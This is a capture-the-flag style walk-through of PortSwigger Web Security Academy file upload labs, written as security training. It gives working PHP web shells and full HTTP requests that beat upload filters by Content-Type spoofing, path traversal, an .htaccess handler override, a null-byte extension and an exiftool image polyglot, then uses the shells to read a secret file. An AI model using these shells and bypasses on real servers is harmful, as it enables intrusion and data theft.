Walk-through of the File upload vulnerabilities lab on PortSwigger Web Security Academy.
- Apprentice – Remote code execution via web shell upload
- Apprentice – Web shell upload via Content-Type restriction bypass
- Practitioner – Web shell upload via path traversal
- Practitioner – Web shell upload via extension blacklist bypass
- Practitioner – Web shell upload via obfuscated file extension
- Practitioner – Remote code execution via polyglot web shell upload
- Expert – Web shell upload via race condition
Apprentice – Remote code execution via web shell upload
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>Click on My account and enter provided credentials (wiener:peter). Click on Choose File to update the Avatar image and select webshell.php. Click on Upload.
Inspect the page. the Avatar image is located at /files/avatars/webshell.php.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secretWe obtain the secret file. Click Submit the solution.
MtOzuGqwEbNd6BMIIUbmwk3S0nhIXiBKApprentice – Web shell upload via Content-Type restriction bypass
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file
/home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>- Click on My account and enter provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get an error:
HTTP/1.1 403 Forbidden
Date: Tue, 07 Feb 2023 14:27:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 238
Sorry, file type application/octet-stream is not allowed
Only image/jpeg and image/png are allowed
Sorry, there was an error uploading your file.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>Send the request to the Repeater module. Change Content-Type from “application/octet-stream” to “image/jpeg”.
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=---------------------------8917356433747280746683964460
Content-Length: 508
...
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="avatar"; filename="webshell.php"
Content-Type: image/jpeg
<?php passthru($_REQUEST[c]); ?>
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="user"
wiener
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="csrf"
n0bXCxETqbab4iyX7uIk4rUSlrBrpxoJ
-----------------------------8917356433747280746683964460--
Inspect the page. the Avatar image is located at /files/avatars/webshell.php.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secretGET /files/avatars/webshell.php?c=cat%20/home/carlos/secret HTTP/1.1
...We obtain the secret file. Click Submit the solution.
RkFG4FCwk8mziFigQkqrNkhnab3JBy5iPractitioner – Web shell upload via path traversal
This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Web servers often use the filename field in multipart/form-data requests to determine the name and location where the file should be saved.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>- Click on My account and enter provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload.
- Inspect the page. the Avatar image is located at /files/avatars/webshell.php. However, the file is not executed.
- Send the request to the Repeater and replace the filename by “../webshell.php” to upload it in the files directory. It give a message “The file avatars/webshell.php has been uploaded.”, which is not the expected result.
- URL-encode the / (%2f) and send the request. The webshell will be uploaded in the files directory.
POST /my-account/avatar HTTP/1.1
...
Cookie: session=RckXGmQg72YWAtC3xrRXVI97QhkyUHw0
Content-Length: 459
...
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="avatar"; filename="..%2fwebshell.php"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="csrf"
aHL8pOr7znjCUsw0IsHieWdJptbVrGve
------WebKitFormBoundary9h8yeuTfegvyCX2q--HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 20:02:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 136
The file avatars/../webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/webshell.php?c=cat%20/home/carlos/secretWe obtain the secret file. Click Submit the solution.
LoIGEFW9wmt2ArqgrRAkDy4IwsU0xiYCPractitioner – Web shell upload via extension blacklist bypass
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>- Click on My account and enter provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get this message:
Sorry, php files are not allowed Sorry, there was an error uploading your file.Create a file .htaccess locally.
AddType application/x-httpd-php .l33t- Upload the file.
- Change the value of the filename parameter to “.htaccess”.
- Change the value of the Content-Type header to “text/plain”.
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXQ9bQMD0l3oFDfao
...
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plain
AddType application/x-httpd-php .l33t
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="csrf"
jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryXQ9bQMD0l3oFDfao--
Upload the webshell (.l33t).
POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqQBNC96c1YVuBBsI
...
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="avatar"; filename="webshell.l33t"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="csrf"
jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryqQBNC96c1YVuBBsI--HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 15:09:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 134
The file avatars/webshell.l33t has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.l33t?c=cat%20/home/carlos/secretWe obtain the secret file. Click Submit the solution.
xPRopdAaKALblqmCEB3uIG0n9TbXTytUPractitioner – Web shell upload via obfuscated file extension
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Create a file webshell.php with the following content:
<?php passthru($_REQUEST[c]); ?>- Click on My account and enter provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Click on Upload. We get this message:
Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.Send the request to the Repeater. Change the filename to “webshell.php%00.jpg”.
POST /my-account/avatar HTTP/1.1
...
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="avatar"; filename="webshell.php%00.jpg"
Content-Type: application/octet-stream
<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="user"
wiener
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="csrf"
1JgfDFdUXGnu1TpJPgM1QX34z2LjcmRn
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC--HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 14:20:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 133
The file avatars/webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secretWe obtain the secret file. Click Submit the solution.
SM1k317Urntufx4jJ3oJSU6mr46qfBfEPractitioner – Remote code execution via polyglot web shell upload
This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
Download any image and insert a PHP webshell payload using Exiftool.
wget -O webshell.jpg http://placekitten.com/100/100exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' webshell.jpg -o webshell.php- Click on My account and enter provided credentials (wiener:peter).
- Click on Choose File to update the Avatar image and select webshell.php.
- Access the webshell to read the secret file.
https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?cmd=cat%20/home/carlos/secretWe obtain the secret file. Click Submit the solution.
Xf7lGsMYGhNbZk9NBBHL4jchA89IL0HeExpert – Web shell upload via race condition
This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
NOT COMPLETED